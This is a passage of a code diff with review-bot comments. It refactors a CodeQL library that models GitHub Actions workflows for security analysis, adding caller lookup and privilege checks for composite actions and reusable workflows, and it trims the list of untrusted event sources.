trimQuotes(flattenedScript.regexpCapture(multilineHereDocAssignmentRegex(var), 3)) - 
.regexpReplaceAll("\\s*>>\\s*(\"|')?\\$(\\{)?GITHUB_" + var.toUpperCase() + - "(\\})?(\"|')?", "") - .replaceAll("::NEW_LINE::", "\n") - .trim() - .splitAt("\n") and - key = trimQuotes(flattenedScript.regexpCapture(multilineHereDocAssignmentRegex(var), 2)) - ) - } - - bindingset[line] - predicate extractPathAssignment(string line, string value) { - exists(string path | - // single path assignment - path = - line.regexpCapture("(echo|Write-Output)\\s+(.*)>>\\s*(\"|')?\\$(\\{)?GITHUB_PATH(\\})?(\"|')?", - 2) and - value = trimQuotes(path) - or - // workflow command assignment - path = - line.regexpCapture("(echo|Write-Output)\\s+(\"|')?::add-path::(.*)(\"|')?", 3) - .regexpReplaceAll("^\"", "") - .regexpReplaceAll("\"$", "") and - value = trimQuotes(path) - ) - } - - predicate writeToGitHubEnv(Run run, string key, string value) { - extractLineAssignment(run.getScript().splitAt("\n"), "ENV", key, value) or - extractMultilineAssignment(run.getScript(), "ENV", key, value) - } - - predicate writeToGitHubOutput(Run run, string key, string value) { - extractLineAssignment(run.getScript().splitAt("\n"), "OUTPUT", key, value) or - extractMultilineAssignment(run.getScript(), "OUTPUT", key, value) - } - - predicate writeToGitHubPath(Run run, string value) { - extractPathAssignment(run.getScript().splitAt("\n"), value) - } -} +import codeql.actions.Helper class AstNode instanceof AstNodeImpl { AstNode getAChildNode() { result = super.getAChildNode() } @@ -193,7 +39,7 @@ class Expression extends AstNode instanceof ExpressionImpl { string getRawExpression() { result = rawExpression } - string getNormalizedExpression() { result = Utils::normalizeExpr(expression) } + string getNormalizedExpression() { result = normalizeExpr(expression) } } /** A common class for `env` in workflow, job or step. */ 
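Review bot: The replacement line `+import codeql.actions.Helper` is the only non-`private` import in this file (the two imports above it are `private import`), so every predicate Helper exports — `normalizeExpr`, `wrapRegexp`, `extractLineAssignment`, `writeToGitHubEnv`, the new `inPrivileged*`/`inNonPrivileged*` family — becomes part of the public surface of `codeql.actions.Ast`, and Helper itself does `private import codeql.actions.Ast`, giving a cyclic dependency between the two modules. If the intent is to keep the former `Utils::` names reachable for existing queries that only import Ast, a comment saying so saves the next reader from "fixing" it, e.g. `// re-exported on purpose: replaces the former Ast::Utils module`; otherwise `private import codeql.actions.Helper` keeps the module's API unchanged. The `AstNode` class that follows the import continues outside the hunk.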
@@ -227,6 +73,10 @@ class CompositeAction extends AstNode instanceof CompositeActionImpl { Input getAnInput() { result = super.getAnInput() } Input getInput(string inputName) { result = super.getInput(inputName) } + + LocalJob getACaller() { result = super.getACaller() } + + predicate isPrivileged() { super.isPrivileged() } } /** @@ -273,6 +123,8 @@ class ReusableWorkflow extends Workflow instanceof ReusableWorkflowImpl { Input getAnInput() { result = super.getAnInput() } Input getInput(string inputName) { result = super.getInput(inputName) } + + ExternalJob getACaller() { result = super.getACaller() } } class Input extends AstNode instanceof InputImpl { } diff --git a/ql/lib/codeql/actions/Helper.qll b/ql/lib/codeql/actions/Helper.qll new file mode 100644 index 000000000000..416cb97c8d08 --- /dev/null +++ b/ql/lib/codeql/actions/Helper.qll 
@@ -0,0 +1,209 @@ +private import codeql.actions.Ast +private import codeql.Locations + +bindingset[expr] +string normalizeExpr(string expr) { + result = + expr.regexpReplaceAll("\\['([a-zA-Z0-9_\\*\\-]+)'\\]", ".$1") + .regexpReplaceAll("\\[\"([a-zA-Z0-9_\\*\\-]+)\"\\]", ".$1") + .regexpReplaceAll("\\s*\\.\\s*", ".") +} + +bindingset[regex] +string wrapRegexp(string regex) { + result = + [ + "\\b" + regex + "\\b", "fromJSON\\(\\s*" + regex + "\\s*\\)", + "toJSON\\(\\s*" + regex + "\\s*\\)" + ] +} + +bindingset[str] +private string trimQuotes(string str) { + result = str.trim().regexpReplaceAll("^(\"|')", "").regexpReplaceAll("(\"|')$", "") +} + +bindingset[line, var] +predicate extractLineAssignment(string line, string var, string key, string value) { + exists(string assignment | + // single line assignment + assignment = + line.regexpCapture("(echo|Write-Output)\\s+(.*)>>\\s*(\"|')?\\$(\\{)?GITHUB_" + + var.toUpperCase() + "(\\})?(\"|')?", 2) and + count(assignment.splitAt("=")) = 2 and + key = trimQuotes(assignment.splitAt("=", 0)) and + value = trimQuotes(assignment.splitAt("=", 1)) + or + // workflow command assignment + assignment = + line.regexpCapture("(echo|Write-Output)\\s+(\"|')?::set-" + var.toLowerCase() + + "\\s+name=(.*)(\"|')?", 3).regexpReplaceAll("^\"", "").regexpReplaceAll("\"$", "") and + key = trimQuotes(assignment.splitAt("::", 0)) and + value = trimQuotes(assignment.splitAt("::", 1)) + ) +} + +bindingset[var] +private string multilineAssignmentRegex(string var) { + // eg: + // echo "PR_TITLE<> $GITHUB_ENV + // echo "$TITLE" >> $GITHUB_ENV + // echo "EOF" >> $GITHUB_ENV + result = + ".*(echo|Write-Output)\\s+(.*)<<[\\-]*\\s*([A-Z]*)EOF(.+)(echo|Write-Output)\\s+(\"|')?([A-Z]*)EOF(\"|')?\\s*>>\\s*(\"|')?\\$(\\{)?GITHUB_" + + var.toUpperCase() + "(\\})?(\"|')?.*" +} + +bindingset[var] +private string multilineBlockAssignmentRegex(string var) { + // eg: + // { + // echo 'JSON_RESPONSE<> "$GITHUB_ENV" + // echo EOF + // } >> "$GITHUB_ENV" + result 
= + ".*\\{(\\s|::NEW_LINE::)*(echo|Write-Output)\\s+(.*)<<[\\-]*\\s*([A-Z]*)EOF(.+)(echo|Write-Output)\\s+(\"|')?([A-Z]*)EOF(\"|')?(\\s|::NEW_LINE::)*\\}\\s*>>\\s*(\"|')?\\$(\\{)?GITHUB_" + + var.toUpperCase() + "(\\})?(\"|')?.*" +} + +bindingset[var] +private string multilineHereDocAssignmentRegex(string var) { + // eg: + // cat <<-EOF >> "$GITHUB_ENV" + // echo "FOO=$TITLE" + // EOF + result = + ".*cat\\s*<<[\\-]*\\s*[A-Z]*EOF\\s*>>\\s*[\"']*\\$[\\{]*GITHUB_.*" + var.toUpperCase() + + "[\\}]*[\"']*.*(echo|Write-Output)\\s+([^=]+)=(.*)::NEW_LINE::.*EOF.*" +} + +bindingset[script, var] +predicate extractMultilineAssignment(string script, string var, string key, string value) { + // multiline assignment + exists(string flattenedScript | + flattenedScript = script.replaceAll("\n", "::NEW_LINE::") and + value = + "$(" + + trimQuotes(flattenedScript.regexpCapture(multilineAssignmentRegex(var), 4)) + .regexpReplaceAll("\\s*>>\\s*(\"|')?\\$(\\{)?GITHUB_" + var.toUpperCase() + + "(\\})?(\"|')?", "") + .replaceAll("::NEW_LINE::", "\n") + .trim() + .splitAt("\n") + ")" and + key = trimQuotes(flattenedScript.regexpCapture(multilineAssignmentRegex(var), 2)) + ) + or + // multiline block assignment + exists(string flattenedScript | + flattenedScript = script.replaceAll("\n", "::NEW_LINE::") and + value = + "$(" + + trimQuotes(flattenedScript.regexpCapture(multilineBlockAssignmentRegex(var), 5)) + .regexpReplaceAll("\\s*>>\\s*(\"|')?\\$(\\{)?GITHUB_" + var.toUpperCase() + + "(\\})?(\"|')?", "") + .replaceAll("::NEW_LINE::", "\n") + .trim() + .splitAt("\n") + ")" and + key = trimQuotes(flattenedScript.regexpCapture(multilineBlockAssignmentRegex(var), 3)) + ) + or + // multiline heredoc assignment + exists(string flattenedScript | + flattenedScript = script.replaceAll("\n", "::NEW_LINE::") and + value = + trimQuotes(flattenedScript.regexpCapture(multilineHereDocAssignmentRegex(var), 3)) + .regexpReplaceAll("\\s*>>\\s*(\"|')?\\$(\\{)?GITHUB_" + var.toUpperCase() + + 
"(\\})?(\"|')?", "") + .replaceAll("::NEW_LINE::", "\n") + .trim() + .splitAt("\n") and + key = trimQuotes(flattenedScript.regexpCapture(multilineHereDocAssignmentRegex(var), 2)) + ) +} + +bindingset[line] +predicate extractPathAssignment(string line, string value) { + exists(string path | + // single path assignment + path = + line.regexpCapture("(echo|Write-Output)\\s+(.*)>>\\s*(\"|')?\\$(\\{)?GITHUB_PATH(\\})?(\"|')?", + 2) and + value = trimQuotes(path) + or + // workflow command assignment + path = + line.regexpCapture("(echo|Write-Output)\\s+(\"|')?::add-path::(.*)(\"|')?", 3) + .regexpReplaceAll("^\"", "") + .regexpReplaceAll("\"$", "") and + value = trimQuotes(path) + ) +} + +predicate writeToGitHubEnv(Run run, string key, string value) { + extractLineAssignment(run.getScript().splitAt("\n"), "ENV", key, value) or + extractMultilineAssignment(run.getScript(), "ENV", key, value) +} + +predicate writeToGitHubOutput(Run run, string key, string value) { + extractLineAssignment(run.getScript().splitAt("\n"), "OUTPUT", key, value) or + extractMultilineAssignment(run.getScript(), "OUTPUT", key, value) +} + +predicate writeToGitHubPath(Run run, string value) { + extractPathAssignment(run.getScript().splitAt("\n"), value) +} + +predicate inPrivilegedCompositeAction(AstNode node) { + exists(CompositeAction a | + // node is in a privileged composite action + a = node.getEnclosingCompositeAction() and + ( + a.isPrivileged() + or + exists(Job caller | + caller = a.getACaller() and + caller.isPrivileged() and + caller.isExternallyTriggerable() + ) + ) + ) +} + +predicate inPrivilegedExternallyTriggerableJob(AstNode node) { + exists(Job j | + // node is in a privileged and externally triggereable job + j = node.getEnclosingJob() and + // job is privileged (write access or access to secrets) + j.isPrivileged() and + // job is triggereable by an external user + j.isExternallyTriggerable() + ) +} + +predicate inNonPrivilegedCompositeAction(AstNode node) { + 
exists(CompositeAction a | + // node is in a non-privileged composite action + a = node.getEnclosingCompositeAction() and + not a.isPrivileged() and + not exists(LocalJob caller | + caller = a.getACaller() and + caller.isPrivileged() and + caller.isExternallyTriggerable() + ) + ) +} + +predicate inNonPrivilegedJob(AstNode node) { + exists(Job j | + // node is in a non-privileged or not externally triggereable job + j = node.getEnclosingJob() and + ( + // job is non-privileged (no write access and no access to secrets) + not j.isPrivileged() + or + // job is triggereable by an external user + not j.isExternallyTriggerable() + ) + ) +} diff --git a/ql/lib/codeql/actions/ast/internal/Ast.qll b/ql/lib/codeql/actions/ast/internal/Ast.qll index 46bbcaaf29ef..ebe2c70533d9 100644 --- a/ql/lib/codeql/actions/ast/internal/Ast.qll +++ b/ql/lib/codeql/actions/ast/internal/Ast.qll @@ -1,6 +1,6 @@ private import codeql.actions.ast.internal.Yaml private import codeql.Locations -private import codeql.actions.Ast::Utils as Utils +private import codeql.actions.Helper private import codeql.actions.dataflow.ExternalFlow /** 
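Review bot: `inPrivilegedCompositeAction` near the end of the new file classifies an action as privileged-and-reachable whenever `a.isPrivileged()` holds, but `CompositeActionImpl.isPrivileged` in the following hunk follows `getACaller().isPrivileged()` without asking whether that caller is externally triggerable, so the second disjunct `caller.isPrivileged() and caller.isExternallyTriggerable()` is subsumed and an action used only from a `push`-triggered privileged job lands in the same bucket as one reachable from `pull_request_target`; `inPrivilegedExternallyTriggerableJob` directly below requires both conditions, and the action variant should match it, which means the caller-derived privilege needs the `isExternallyTriggerable()` conjunct either in `CompositeActionImpl.isPrivileged` or here. The two action predicates also declare the caller differently (`Job caller` here, `LocalJob caller` in `inNonPrivilegedCompositeAction`); since `getACaller()` returns `LocalJob`, use the same type in both so a reader does not hunt for a semantic difference. The comments spell "triggereable" three times. The rest of the file is the former `Ast::Utils` module moved verbatim.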
@@ -299,6 +299,47 @@ class CompositeActionImpl extends AstNodeImpl, TCompositeAction { n.lookup("inputs").(YamlMapping).maps(result.getNode(), _) and result.getNode().getValue() = name } + + LocalJobImpl getACaller() { + exists(LocalJobImpl caller, string gwf_path, string path | + // the workflow files may not be rooted in the parent directory of .github/workflows + // extract the offset so we can remove it from the action path + gwf_path = + caller + .getLocation() + .getFile() + .getRelativePath() + .prefix(caller.getLocation().getFile().getRelativePath().indexOf(".github/workflows/")) and + path = this.getLocation().getFile().getRelativePath().replaceAll(gwf_path, "") and + caller.getAStep().(UsesStepImpl).getCallee() = + path.prefix(path.indexOf(["/action.yml", "/action.yaml"])) and + result = caller + ) + } + + /** Holds if the action is privileged. */ + predicate isPrivileged() { + // there is a calling job that defines explicit write permissions + this.hasExplicitWritePermission() + or + // the actions has an explicit secret accesses + this.hasExplicitSecretAccess() + or + // there is a privileged caller job + this.getACaller().isPrivileged() + } + + private predicate hasExplicitSecretAccess() { + // the job accesses a secret other than GITHUB_TOKEN + exists(SecretsExpressionImpl expr | + expr.getEnclosingCompositeAction() = this and not expr.getFieldName() = "GITHUB_TOKEN" + ) + } + + private predicate hasExplicitWritePermission() { + // a calling job has an explicit write permission + this.getACaller().getPermissions().getAPermission().matches("%write") + } } class WorkflowImpl extends AstNodeImpl, TWorkflowNode { 
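Review bot: In `getACaller`, `path` is `this`'s relative path with the workflow-root offset removed, so for the test layout it becomes `.github/actions/action1/action.yml` and `path.prefix(path.indexOf(["/action.yml", "/action.yaml"]))` yields `.github/actions/action1`, whereas `UsesStepImpl.getCallee()` (hunk at -960 below) returns the raw `uses` value for local references, which GitHub requires to start with `./`; unless the callers in the tests omit the `./`, the equality never holds. Comparing against `"./" + path.prefix(path.indexOf(["/action.yml", "/action.yaml"]))`, or normalising the callee once in `getCallee()`, fixes it, and a test with `uses: ./.github/actions/x` would pin it. `replaceAll(gwf_path, "")` also removes every occurrence of the prefix rather than only the leading one, and when `.github/workflows/` sits at the repository root `gwf_path` is `prefix(0)`, the empty string, whose behaviour in `replaceAll` I cannot confirm from here; `path = this.getLocation().getFile().getRelativePath().suffix(gwf_path.length())` says what is meant. The class body continues outside the hunk.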
@@ -328,10 +369,10 @@ class WorkflowImpl extends AstNodeImpl, TWorkflowNode { string getName() { result = n.lookup("name").(YamlString).getValue() } /** Gets the job within this workflow with the given job ID. */ - JobImpl getJob(string jobId) { result.getWorkflow() = this and result.getId() = jobId } + JobImpl getJob(string jobId) { result.getEnclosingWorkflow() = this and result.getId() = jobId } /** Gets a job within this workflow */ - JobImpl getAJob() { result = this.getJob(_) } + JobImpl getAJob() { result.getEnclosingWorkflow() = this } /** Gets the permissions granted to this workflow. */ PermissionsImpl getPermissions() { result.getNode() = n.lookup("permissions") } @@ -368,6 +409,10 @@ class ReusableWorkflowImpl extends AstNodeImpl, WorkflowImpl { workflow_call.(YamlMapping).lookup("inputs").(YamlMapping).maps(result.getNode(), _) and result.getNode().(YamlString).getValue() = name } + + ExternalJobImpl getACaller() { + result.getCallee() = this.getLocation().getFile().getRelativePath() + } } class RunsImpl extends AstNodeImpl, TRunsNode { @@ -649,12 +694,10 @@ class JobImpl extends AstNodeImpl, TJobNode { YamlMapping n; string jobId; WorkflowImpl workflow; - YamlMappingLikeNode runson; JobImpl() { this = TJobNode(n) and - workflow.getNode().lookup("jobs").(YamlMapping).lookup(jobId) = n and - runson = n.lookup("runs-on").(YamlMappingLikeNode) + workflow.getNode().lookup("jobs").(YamlMapping).lookup(jobId) = n } override string toString() { result = "Job: " + jobId } 
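Review bot: `ReusableWorkflowImpl.getACaller()` in the hunk at -368 compares `result.getCallee()` with the reusable workflow's full relative path, but it applies none of the workflow-root offset handling that `CompositeActionImpl.getACaller()` does in the hunk above, and a local `uses: ./.github/workflows/reusable.yml` carries a leading `./`; `ExternalJobImpl.getCallee()` is not visible here, so I cannot tell whether it strips either, but if it behaves like `UsesStepImpl.getCallee()` the predicate only matches when the database is rooted exactly at the repository and the `./` is absent. Factoring the path normalisation out of `CompositeActionImpl.getACaller()` into one shared helper and using it in both places keeps the two callers consistent. Since `JobImpl.isPrivileged` (next hunk) now relies on this predicate, a silently non-matching caller makes every reusable-workflow job look non-privileged rather than producing an error.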
@@ -765,14 +808,9 @@ class JobImpl extends AstNodeImpl, TJobNode { count(this.getATriggerEvent()) = 1 and not this.getATriggerEvent().getName() = ["pull_request", "workflow_call"] or - // The Workflow is only triggered by `workflow_call` and there is - // a caller workflow triggered by an event other than `pull_request` - this.hasSingleTrigger("workflow_call") and - exists(ExternalJobImpl call, JobImpl caller | - call.getCallee() = this.getLocation().getFile().getRelativePath() and - caller = call.getEnclosingJob() and - caller.isPrivileged() - ) + // The Workflow is a Reusable Workflow only and there is + // a privileged caller workflow + this.getEnclosingWorkflow().(ReusableWorkflowImpl).getACaller().isPrivileged() or // The Workflow has multiple triggers so at least one is not "pull_request" count(this.getATriggerEvent()) > 1 @@ -781,14 +819,15 @@ class JobImpl extends AstNodeImpl, TJobNode { /** Gets the trigger event that starts this workflow. */ EventImpl getATriggerEvent() { result = this.getEnclosingWorkflow().getATriggerEvent() } - private predicate hasSingleTrigger(string trigger) { - this.getATriggerEvent().getName() = trigger and - count(this.getATriggerEvent()) = 1 - } - + // private predicate hasSingleTrigger(string trigger) { + // this.getATriggerEvent().getName() = trigger and + // count(this.getATriggerEvent()) = 1 + // } /** Gets the runs-on field of the job. */ string getARunsOnLabel() { - exists(ScalarValueImpl lbl | + exists(ScalarValueImpl lbl, YamlMappingLikeNode runson | + runson = n.lookup("runs-on").(YamlMappingLikeNode) + | ( lbl.getNode() = runson.getNode(_) and not lbl.getNode() = runson.getNode("group") 
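Review bot: The hunk at -781 keeps `hasSingleTrigger` as a commented-out block instead of deleting it (its only caller was removed in the hunk above) and also swallows the blank line, so `/** Gets the runs-on field of the job. */` now sits directly beneath dead comment text; drop the four `//` lines — history keeps them — and restore the blank line. In `isPrivileged`, the new disjunct `this.getEnclosingWorkflow().(ReusableWorkflowImpl).getACaller().isPrivileged()` no longer requires `workflow_call` to be the workflow's only trigger, which the rewritten comment `// The Workflow is a Reusable Workflow only and there is` still claims; either restore the single-trigger condition or change the comment to `// The workflow is callable and at least one calling job is privileged`. `JobImpl`'s body continues outside both hunks.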
@@ -960,14 +999,14 @@ class UsesStepImpl extends StepImpl, UsesImpl { /** Gets the owner and name of the repository where the Action comes from, e.g. `actions/checkout` in `actions/checkout@v2`. */ override string getCallee() { - if u.getValue().matches("./%") - then result = u.getValue() - else + if u.getValue().indexOf("@") > 0 + then result = ( u.getValue().regexpCapture(usesParser(), 1) + "/" + u.getValue().regexpCapture(usesParser(), 2) ).toLowerCase() + else result = u.getValue() } /** Gets the version reference used when checking out the Action, e.g. `2` in `actions/checkout@v2`. */ 
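Review bot: The doc comment kept above `getCallee` (`Gets the owner and name of the repository where the Action comes from, e.g. actions/checkout ...`) is now inaccurate for the new `else` branch, which returns the raw `uses` value — a local path such as `./.github/actions/x` — whenever no `@` is present; extend it, e.g. `/** Gets `owner/name` for a versioned remote Action, e.g. `actions/checkout` in `actions/checkout@v2`; for references without an `@` (local paths) the raw `uses` value is returned unchanged, including any leading `./`. */`. `indexOf("@")` is multi-valued in QL, so the condition holds when any `@` sits past index 0; that is fine for the intended inputs but worth stating, since the regex branch produces no result when `usesParser()` does not match. `UsesStepImpl`'s body continues outside the hunk.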
@@ -1061,27 +1100,26 @@ abstract class SimpleReferenceExpressionImpl extends ExpressionImpl { } private string stepsCtxRegex() { - result = Utils::wrapRegexp("steps\\.([A-Za-z0-9_-]+)\\.outputs\\.([A-Za-z0-9_-]+)") + result = wrapRegexp("steps\\.([A-Za-z0-9_-]+)\\.outputs\\.([A-Za-z0-9_-]+)") } private string needsCtxRegex() { - result = Utils::wrapRegexp("needs\\.([A-Za-z0-9_-]+)\\.outputs\\.([A-Za-z0-9_-]+)") + result = wrapRegexp("needs\\.([A-Za-z0-9_-]+)\\.outputs\\.([A-Za-z0-9_-]+)") } private string jobsCtxRegex() { - result = Utils::wrapRegexp("jobs\\.([A-Za-z0-9_-]+)\\.outputs\\.([A-Za-z0-9_-]+)") + result = wrapRegexp("jobs\\.([A-Za-z0-9_-]+)\\.outputs\\.([A-Za-z0-9_-]+)") } -private string envCtxRegex() { result = Utils::wrapRegexp("env\\.([A-Za-z0-9_-]+)") } +private string envCtxRegex() { result = wrapRegexp("env\\.([A-Za-z0-9_-]+)") } -private string matrixCtxRegex() { result = Utils::wrapRegexp("matrix\\.(.+)") } +private string matrixCtxRegex() { result = wrapRegexp("matrix\\.(.+)") } private string inputsCtxRegex() { - result = - Utils::wrapRegexp(["inputs\\.([A-Za-z0-9_-]+)", "github\\.event\\.inputs\\.([A-Za-z0-9_-]+)"]) + result = wrapRegexp(["inputs\\.([A-Za-z0-9_-]+)", "github\\.event\\.inputs\\.([A-Za-z0-9_-]+)"]) } -private string secretsCtxRegex() { result = Utils::wrapRegexp("secrets\\.([A-Za-z0-9_-]+)") } +private string secretsCtxRegex() { result = wrapRegexp("secrets\\.([A-Za-z0-9_-]+)") } /** * Holds for an expression accesing the `secrets` context. @@ -1091,8 +1129,8 @@ class SecretsExpressionImpl extends SimpleReferenceExpressionImpl { string fieldName; SecretsExpressionImpl() { - Utils::normalizeExpr(expression).regexpMatch(secretsCtxRegex()) and - fieldName = Utils::normalizeExpr(expression).regexpCapture(secretsCtxRegex(), 1) + normalizeExpr(expression).regexpMatch(secretsCtxRegex()) and + fieldName = normalizeExpr(expression).regexpCapture(secretsCtxRegex(), 1) } override string getFieldName() { result = fieldName } 
@@ -1110,9 +1148,9 @@ class StepsExpressionImpl extends SimpleReferenceExpressionImpl { string fieldName; StepsExpressionImpl() { - Utils::normalizeExpr(expression).regexpMatch(stepsCtxRegex()) and - stepId = Utils::normalizeExpr(expression).regexpCapture(stepsCtxRegex(), 1) and - fieldName = Utils::normalizeExpr(expression).regexpCapture(stepsCtxRegex(), 2) + normalizeExpr(expression).regexpMatch(stepsCtxRegex()) and + stepId = normalizeExpr(expression).regexpCapture(stepsCtxRegex(), 1) and + fieldName = normalizeExpr(expression).regexpCapture(stepsCtxRegex(), 2) } override string getFieldName() { result = fieldName } @@ -1142,9 +1180,9 @@ class NeedsExpressionImpl extends SimpleReferenceExpressionImpl { string fieldName; NeedsExpressionImpl() { - Utils::normalizeExpr(expression).regexpMatch(needsCtxRegex()) and - fieldName = Utils::normalizeExpr(expression).regexpCapture(needsCtxRegex(), 2) and - neededJob.getId() = Utils::normalizeExpr(expression).regexpCapture(needsCtxRegex(), 1) and + normalizeExpr(expression).regexpMatch(needsCtxRegex()) and + fieldName = normalizeExpr(expression).regexpCapture(needsCtxRegex(), 2) and + neededJob.getId() = normalizeExpr(expression).regexpCapture(needsCtxRegex(), 1) and neededJob.getLocation().getFile() = this.getLocation().getFile() } @@ -1175,9 +1213,9 @@ class JobsExpressionImpl extends SimpleReferenceExpressionImpl { string fieldName; JobsExpressionImpl() { - Utils::normalizeExpr(expression).regexpMatch(jobsCtxRegex()) and - jobId = Utils::normalizeExpr(expression).regexpCapture(jobsCtxRegex(), 1) and - fieldName = Utils::normalizeExpr(expression).regexpCapture(jobsCtxRegex(), 2) + normalizeExpr(expression).regexpMatch(jobsCtxRegex()) and + jobId = normalizeExpr(expression).regexpCapture(jobsCtxRegex(), 1) and + fieldName = normalizeExpr(expression).regexpCapture(jobsCtxRegex(), 2) } override string getFieldName() { result = fieldName } 
@@ -1200,8 +1238,8 @@ class InputsExpressionImpl extends SimpleReferenceExpressionImpl { string fieldName; InputsExpressionImpl() { - Utils::normalizeExpr(expression).regexpMatch(inputsCtxRegex()) and - fieldName = Utils::normalizeExpr(expression).regexpCapture(inputsCtxRegex(), 1) + normalizeExpr(expression).regexpMatch(inputsCtxRegex()) and + fieldName = normalizeExpr(expression).regexpCapture(inputsCtxRegex(), 1) } override string getFieldName() { result = fieldName } @@ -1225,8 +1263,8 @@ class EnvExpressionImpl extends SimpleReferenceExpressionImpl { string fieldName; EnvExpressionImpl() { - Utils::normalizeExpr(expression).regexpMatch(envCtxRegex()) and - fieldName = Utils::normalizeExpr(expression).regexpCapture(envCtxRegex(), 1) + normalizeExpr(expression).regexpMatch(envCtxRegex()) and + fieldName = normalizeExpr(expression).regexpCapture(envCtxRegex(), 1) } override string getFieldName() { result = fieldName } @@ -1251,8 +1289,8 @@ class MatrixExpressionImpl extends SimpleReferenceExpressionImpl { string fieldAccess; MatrixExpressionImpl() { - Utils::normalizeExpr(expression).regexpMatch(matrixCtxRegex()) and - fieldAccess = Utils::normalizeExpr(expression).regexpCapture(matrixCtxRegex(), 1) + normalizeExpr(expression).regexpMatch(matrixCtxRegex()) and + fieldAccess = normalizeExpr(expression).regexpCapture(matrixCtxRegex(), 1) } override string getFieldName() { result = fieldAccess } diff --git a/ql/lib/codeql/actions/controlflow/internal/Cfg.qll b/ql/lib/codeql/actions/controlflow/internal/Cfg.qll index ba6430f157fc..1fe4a3e7e1c9 100644 --- a/ql/lib/codeql/actions/controlflow/internal/Cfg.qll +++ b/ql/lib/codeql/actions/controlflow/internal/Cfg.qll @@ -186,8 +186,8 @@ private class WorkflowTree extends StandardPreOrderTree instanceof Workflow { result = rank[i](AstNode child, Location l | ( - child = super.getAJob() or - child = super.getStrategy() + child = super.getStrategy() or + child = super.getAJob() ) and l = child.getLocation() | 
@@ -242,7 +242,26 @@ private class JobTree extends StandardPreOrderTree instanceof LocalJob { } } -private class UsesTree extends StandardPreOrderTree instanceof Uses { +private class ExternalJobTree extends StandardPreOrderTree instanceof ExternalJob { + override ControlFlowTree getChildNode(int i) { + result = + rank[i](AstNode child, Location l | + ( + child = super.getArgumentExpr(_) or + child = super.getInScopeEnvVarExpr(_) or + child = super.getOutputs() or + child = super.getStrategy() + ) and + l = child.getLocation() + | + child + order by + l.getStartLine(), l.getStartColumn(), l.getEndColumn(), l.getEndLine(), child.toString() + ) + } +} + +private class UsesTree extends StandardPreOrderTree instanceof UsesStep { override ControlFlowTree getChildNode(int i) { result = rank[i](AstNode child, Location l | diff --git a/ql/lib/codeql/actions/dataflow/FlowSources.qll b/ql/lib/codeql/actions/dataflow/FlowSources.qll index d9f7b14edd3b..ca3e21e9d255 100644 --- a/ql/lib/codeql/actions/dataflow/FlowSources.qll +++ b/ql/lib/codeql/actions/dataflow/FlowSources.qll @@ -33,7 +33,7 @@ private predicate titleEvent(string context) { "github\\.event\\.workflow_run\\.display_title", // The event-specific title associated with the run or the run-name if set, or the value of run-name if it is set in the workflow. ] | - Utils::normalizeExpr(context).regexpMatch(Utils::wrapRegexp(reg)) + normalizeExpr(context).regexpMatch(wrapRegexp(reg)) ) } @@ -46,7 +46,7 @@ private predicate urlEvent(string context) { "github\\.event\\.pull_request\\.head\\.repo\\.homepage", ] | - Utils::normalizeExpr(context).regexpMatch(Utils::wrapRegexp(reg)) + normalizeExpr(context).regexpMatch(wrapRegexp(reg)) ) } 
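Review bot: The new `ExternalJobTree` class has no QLDoc, unlike the surrounding tree classes it sits between; a hedged one-liner such as `/** CFG tree for an ExternalJob: its argument expressions, in-scope env vars, outputs and strategy, ordered by location. */` states what the visible child list actually contains. Its `order by` compares `l.getEndColumn()` before `l.getEndLine()`, so two children with the same start position are sorted by end column ahead of end line; if that is copied from `UsesTree` for consistency keep it, otherwise `l.getEndLine(), l.getEndColumn()` is the natural order. If `ExternalJob` exposes further expression-bearing children (an `if` condition, for example), they are not in this list — I cannot see its definition from here.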
@@ -68,11 +68,9 @@ private predicate textEvent(string context) { "github\\.event\\.workflow_run\\.head_repository\\.description", // description "github\\.event\\.client_payload\\[[0-9]+\\]", // payload "github\\.event\\.client_payload", // payload - "github\\.event\\.inputs\\[[0-9]+\\]", // input - "github\\.event\\.inputs", // input ] | - Utils::normalizeExpr(context).regexpMatch(Utils::wrapRegexp(reg)) + normalizeExpr(context).regexpMatch(wrapRegexp(reg)) ) } @@ -100,7 +98,7 @@ private predicate branchEvent(string context) { "github\\.event\\.merge_group\\.head_ref", ] | - Utils::normalizeExpr(context).regexpMatch(Utils::wrapRegexp(reg)) + normalizeExpr(context).regexpMatch(wrapRegexp(reg)) ) } @@ -114,7 +112,7 @@ private predicate labelEvent(string context) { "github\\.event\\.pull_request\\.head\\.label", ] | - Utils::normalizeExpr(context).regexpMatch(Utils::wrapRegexp(reg)) + normalizeExpr(context).regexpMatch(wrapRegexp(reg)) ) } @@ -134,7 +132,7 @@ private predicate emailEvent(string context) { "github\\.event\\.workflow_run\\.head_commit\\.committer\\.email", ] | - Utils::normalizeExpr(context).regexpMatch(Utils::wrapRegexp(reg)) + normalizeExpr(context).regexpMatch(wrapRegexp(reg)) ) } @@ -154,7 +152,7 @@ private predicate usernameEvent(string context) { "github\\.event\\.workflow_run\\.head_commit\\.committer\\.name", ] | - Utils::normalizeExpr(context).regexpMatch(Utils::wrapRegexp(reg)) + normalizeExpr(context).regexpMatch(wrapRegexp(reg)) ) } @@ -168,7 +166,7 @@ private predicate pathEvent(string context) { "github\\.event\\.workflow_run\\.referenced_workflows\\.path", ] | - Utils::normalizeExpr(context).regexpMatch(Utils::wrapRegexp(reg)) + normalizeExpr(context).regexpMatch(wrapRegexp(reg)) ) } 
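Review bot: Dropping `"github\\.event\\.inputs\\[[0-9]+\\]"` and `"github\\.event\\.inputs"` from `textEvent` (and `"github\\.event\\.inputs"` from `jsonEvent` in the `@@ -181,7 +179,7 @@` hunk) means an expression that reads the whole inputs object — `toJSON(github.event.inputs)` or an indexed access — is no longer a remote source; only the per-field `github.event.inputs.<name>` form handled by `inputsCtxRegex` remains. If the intent is that inputs are now modeled as parameters rather than sources, a comment at the list head, e.g. `// github.event.inputs.<name> is modeled as a parameter (InputsExpressionImpl), not listed here`, would record that; if not, the whole-object entries should stay, since `workflow_dispatch` inputs are set by whoever may dispatch the workflow.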
